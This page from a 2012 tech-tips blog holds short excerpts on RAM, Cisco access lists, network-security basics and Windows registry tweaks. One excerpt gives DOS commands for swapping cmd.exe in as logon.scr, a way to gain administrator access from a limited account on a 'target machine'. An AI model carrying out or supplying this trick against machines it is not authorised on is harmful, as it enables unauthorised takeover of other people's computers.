Pages

Braniac Bhai Headline Animator

Search This Blog

Feb 24, 2012


How to Troubleshoot RAM Memory


When you have memory problems, you know you are limited in your troubleshooting and hopefully you will be able to resolve the problem quickly. It’s a great idea to first verify the problem exist.

Shutdown and reboot your computer to see if the problem re-appears. Sometimes rebooting the PC will correct the problem and you'll be on your way.

Feb 23, 2012

How To Hack Windows XP Admin Password

How To Hack Windows XP Admin Password


If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Lock Any Folder Using DOS

Lock Any Folder Using DOS


Friends Hide your folders with out using any soft. just go to,

Start.....>

run.....>

cmd....>

note 1 "_" give 1 space on that place

note 2 ex:- if your folder is at D drive then

Kill Yahoo Chat Room Ads

Kill Yahoo Chat Room Ads...


Create a new text document, copy and paste the following...

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Yahoo\Pager\yurl]
"Finance Disclaimer"="http://msg.edit.yahoo.com/config/jlb"
"Chat Adurl"="http://chat.yahoo.com/c/msg/tabs.html?spaceid=21501837"

Doesn't matter what you name it, as long as you change it from .txt to .reg.

It works well with my Yahoo, should work the same for everyone else as well.

Feb 22, 2012

How to Configure Extended Access List On Router

Configure Extended Access Lists


An extended ACL gives you much more power than just a standard ACL. Extended IP ACLs check both the source and destination packet addresses. They can also check for specific protocols, port numbers, and other parameters, which allow administrators more flexibility and control.

access-list access-list-number {permit | deny}
protocol source source-wildcard [operator port]
destination destination-wildcard [operator port]
[established] [log]
 
Command Parameters Descriptions
access-list Main command
access-list-number Identifies the list using a number in the ranges of 100.199 or 2000. 2699.
permit | deny Indicates whether this entry allows or blocks the specified address.
protocol IP, TCP, UDP, ICMP, GRE, or IGRP.
source and destination Identifies source and destination IP addresses.
source-wildcard and destination-wildcard The operator can be lt (less than), gt (greater than), eq (equal to), or neq (not equal to). The port number referenced can be either the source port or the destination port, depending on where in the ACL the port number is configured. As an alternative to the port number, well-known application names can be used, such as Telnet, FTP, and SMTP.
established For inbound TCP only. Allows TCP traffic to pass if the packet is a response to an outbound-initiated session. This type of traffic has the acknowledgement (ACK) bits set. (See the Extended ACL with the Established Parameter example.)
log Sends a logging message to the console.

How to Configure Standard Access List On Router

Standard Access Lists


Because a standard access list filters only traffic based on source traffic, all you need is the IP address of the host or subnet you want to permit or deny. ACLs are created in global configuration mode and then applied on an interface. The syntax for creating a standard ACL is
access-list {1-99 | 1300-1999} {permit | deny} source-address
 [wildcard mask]
In this article we will configure standard access list. If you want read the feature and characteristic of access list reads this previous article.


In this article we will use a RIP running topology. Which we created in RIP routing practical.


Access Control List Standard Extended

Access Control List


ACLs are basically a set of commands, grouped together by a number or name that is used to filter traffic entering or leaving an interface.
When activating an ACL on an interface, you must specify in which direction the traffic should be filtered:
  • Inbound (as the traffic comes into an interface)
  • Outbound (before the traffic exits an interface)
Inbound ACLs:
Incoming packets are processed before they are routed to an outbound interface. An inbound ACL is efficient because it saves the overhead of routing lookups if the packet will be discarded after it is denied by the filtering tests. If the packet is permitted by the tests, it is processed for routing.

Outbound ACLs:
Incoming packets are routed to the outbound interface and then processed through the outbound ACL.

Network Security Mitigating Common Threats

Network Security Mitigating Common Threats


Improper and incomplete network device installation is an often-overlooked security threat that, if left unaddressed, can have terrible results. Software-based security measures alone cannot prevent intended or even accidental network damage caused by poor installation. Now we will describe how to mitigate common security threats to Server Routers and Switches.

Physical Installations

Physical installations involve four types of threats:
hardware, electrical, environmental, and maintenance.

Hardware threats

Hardware threats involve threats of physical damage to the router or switch hardware. Mission-critical Cisco network equipment should be located in wiring closets or in computer or telecommunications rooms that meet these minimum requirements:

Network Security Types of Attack Reconnaissance Attack

Reconnaissance Attacks


A reconnaissance attack occurs when an adversary tries to learn information about your network.

Reconnaissance is the unauthorized discovery and mapping of systems, services, or vulnerabilities.

Reconnaissance is also known as information gathering and, in most cases, precedes an actual access or DoS attack. First, the malicious intruder typically conducts a ping sweep of the target network to determine which IP addresses are alive. Then the intruder determines which services or ports are active on the live IP addresses. From this information, the intruder queries the ports to determine the type and version of the application and operating system running on the target host.

Feb 21, 2012

How To Remove OS Choice From Booting Menu

How To Remove OS Choice From Booting Menu


Right click on "my computer”. Click "properties”. Then click on "advanced" tab. click on "settings" in bottom most column "startup & recovery”. Click on” edit" & notepad file will come up. It should contain only one line something like this (not necessarily same but similar).

Quote:

Network Security Types of Attack Passive Attack Active Attack

Network Security


A security policy defines what people can and can't do with network components and resources.

Need for Network Security

In the past, hackers were highly skilled programmers who understood the details of computer communications and how to exploit vulnerabilities. Today almost anyone can become a hacker by downloading tools from the Internet. These complicated attack tools and generally open networks have generated an increased need for network security and dynamic security policies.

The easiest way to protect a network from an outside attack is to close it off completely from the outside world. A closed network provides connectivity only to trusted known parties and sites; a closed network does not allow a connection to public networks.
Because they have no Internet connectivity, networks designed in this way can be considered safe from Internet attacks. However, internal threats still exist.
There is a estimates that 60 to 80 percent of network misuse comes from inside the enterprise where the misuse has taken place.

Network Definitions Characteristics Components locations

What Is a Network?


The first assignment in understanding how to build a computer network is defining what a network is and understanding how it is used to help a business meet its objectives.

Network is a combination of computer hardware, cabling, network devices, and computer software used together to allow computers to communicate with each other.

Or

A network is basically all of the components (hardware and software) involved in connecting computers across small and large distances. Networks are used to provide easy access to information, thus increasing productivity for users.

Network hardware is mainly made by two basic components: the entities that want to share the information or resources, such as servers and workstations, and the medium that enables the entities to communicate, which is a cable or a wireless medium

How to Easily and Safely Install RAM

How to Easily and Safely Install RAM




Check to see if you have ample light. You may want to have a container to place small
screws in. The system unit cover may have small screws and you don't want to lose them.

After you have plenty of work space and ample lighting, prepare your mind as well. Make
this and every other adventure of working on your computer educational and fun.

Install More RAM In Your Laptop For More Speed



Install More RAM In Your Laptop For More Speed


Your Laptop is indeed your companion, especially when you're on the go. We often take
both our laptops on vacation, in town to catch up on some work. And boosting your
knowledge of your laptop with go a long long way in saving you money by repairing it
yourself.

Installing memory is one of the easiest tasks. Take the time to first be sure you have the
right RAM for your computer. If you're in doubt take it back to the place of purchase and
be sure you have the right RAM. After being certain you have the right RAM, you're ready
to open the system unit and begin. But first, you need to remove static electricity.

First: Turn Off the Laptop and remove the Battery, normally located on the bottom of
the computer.

Second: Turn the Laptop over and locate the RAM compartment. Some Laptops
Memory Module Compartments may be located in another area. Check your owner's
manual to be certain.

Feb 18, 2012

Disable Notification Area Balloon Tips In Windows XP

Disable Notification Area Balloon Tips In Windows XP


To Disable the Notification Area Balloon Tips

Warning: If you use Registry Editor incorrectly, you may cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that you can solve problems that result from using Registry Editor incorrectly. Use Registry Editor at your own risk.

1. Click Start, click Run, type regedit, and then press ENTER.

Create A Shortcut To Lock Your Computer

Create A Shortcut To Lock Your Computer


Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver.

To create a shortcut on your desktop to lock your computer:

Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation

Changing The MaxMTU For Faster Downloads

Changing The MaxMTU For Faster Downloads


There are four Internet settings that can be configured, you can get greater throughput (faster Internet downloads) by modifying a few settings.

They are the MaxMTU, MaxMSS and DefaultRcvWindow, and DefaultTTL.
1. Open RegEdit.
2. Go to
HKEY_LOCAL_MACHINE\System\CurrentControlset\Services\Class\net\000x
(where x is your particular network adapter binding).

Changing The Location Of Windows Installation Files

Changing The Location Of Windows Installation Files


If you need to change the drive and or path where Windows looks for its installation files:

1. Open RegEdit.
2. Go to

HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Setup
3. Edit the value next to SourcePath.

Change DOS Color

Change DOS Color



SYNTAX Sets the default console foreground and background colors.
COLOR [attr]

attr Specifies color attribute of console output 

Color attributes are specified by TWO hex digits -- the first corresponds to the background; the second the foreground. Each digit can be any of the below values.

0 = Black
8 = Gray
1 = Blue
9 = Light Blue
2 = Green
A = Light Green
3 = Aqua
B = Light Aqua
4 = Red
C = Light Red
5 = Purple
D = Light Purple
6 = Yellow
E = Light Yellow
7 = White
F = Bright White

Feb 17, 2012

Clear CMOS - All Tricks

Clear CMOS - All Tricks


Entering Debug:

Debug has been included in every version of MS-DOS as well as Windows. When running any of the debug routines it is recommended that if you have Windows that you exit or shut down to get into a real DOS prompt (unless you're running Windows ME, Windows 2000, Windows XP, or later versions).

Once at the MS- DOS prompt, run through the below example, this example is perfectly fine to run on any PC Computer running MS-DOS / Windows and will not harm anything. Type debug and press enter. This should get you to a - (small dash). This is the debug prompt. At the - type d40:00 and press enter; this will return several lines of information. After the feedback you will be back to the debug prompt. To exit out of debug type q and press enter. This will return you back to the MS-DOS prompt.

In some of the below debug routines you will notice that a "g" is typed, then "q". G tells the computer that the code type is not self executing and must be run at this point. If completed, the program will return Program Terminated Normally which indicates you can now quit from the debug program.
Testing Ports:

Auto Window Refresh

Auto Window Refresh 


Whenever you make a change to your windows you have to press F5 or do a manual refresh.
With this tweak you can tell windows to increase the rate at which it does the refreshing.
Navigate to the key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Update

Create a new DWORD value, or modify the existing value, named UpdateMode and set it to equal "0" for faster updates. Restart Windows for the change to take effect.

Alphabetize Your Start Menus Program List

Alphabetize Your Start Menus Program List 


Manual Instructions: 

1. Click Start -> Programs

2. Mouseover an item on the Programs list

3. Right-click or hit the context menu button (or Shift+F10)

Add A Website Link To Start Menu

Add A Website Link To Start Menu


To Install : Copy the code below to notepad and save it as link.reg then just right click on it and choose "merge".

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}]
@="TweakXP.com"

[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}\DefaultIcon]
@="%SystemRoot%\\system32\\shell32.dll,-47"

[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}\Instance\InitPropertyBag]
"CLSID"="{13709620-C279-11CE-A49E-444553540000}"
"method"="ShellExecute"
"Command"="Wehackers.blogspot.com"
"Param1"="http://www.wehackers.blogspot.com"

To uninstall : Copy the code below to notepad and save as rem.reg and right click and choose merge.

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}]
@=""

[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}\DefaultIcon]
@=""

[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}\Instance\InitPropertyBag]
"CLSID"="{13709620-C279-11CE-A49E-444553540000}"
"method"="ShellExecute"
"command"=""
"Param1"=""

Force Windows XP To Reboot Upon Crashing

 Force Windows XP To Reboot Upon Crashing


This registry edit will cause your system to reboot itself automatically upon crashing. This can be useful if you have a reason for
keeping your system on 24/7:

1. Open REGEDIT.
2. Navigate to 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl'.
3. Edit the 'AutoReboot' value to '1'.